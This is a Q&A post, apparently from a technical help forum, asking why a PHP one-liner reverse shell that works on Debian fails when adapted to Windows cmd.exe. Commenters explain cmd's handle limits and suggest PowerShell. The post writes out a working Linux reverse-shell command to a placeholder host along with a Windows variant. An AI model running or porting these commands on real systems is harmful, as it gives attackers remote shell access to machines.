# How to make "<&3 >&3 2>&3" command works in Windows as in Linux?

Tags: linux, windows, command-line, bash, ssh

I tried this commmand on Debian GNU/Linux 11 (bullseye) shell :

`php -r '$sock=fsockopen("HOST",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'`,

and it worked successfully.

But when I tried to run the same command on Windows 10 CMD with minor changes :

`php -r "$sock=fsockopen('HOST',PORT);exec('cmd.exe -i <&3 >&3 2>&3');"`,

it has a different behavior, unlike when running on Linux. I believe the change of behaviour is because of the difference in Linux's File Descriptor and Windows's File Handle syntax, but feel free to correct the other part of the command if it effects on the changes attributed to the behaviour between those OS.

Comment: You have to use powershell as handles 3-9 are undefined in cmd - see [Command Redirection, Pipes - Windows CMD - SS64.com](https://ss64.com/nt/syntax-redirection.html)

Comment: Hello, you should be more precise when describing success/failure. "worked successfully" and "it has a different behavior" are **not** accurate at all.

Comment: @DavidPostill is there any workaround to still use cmd?

Comment: @Destroy666 It worked successfully when it opens a session to the host, maintain its connection, and behave as a reverse shell. While I don't know the difference in behaviour exactly but It only opens a session to the host and can't maintain its connection in cmd.

Comment: There is no workaround as far as I know.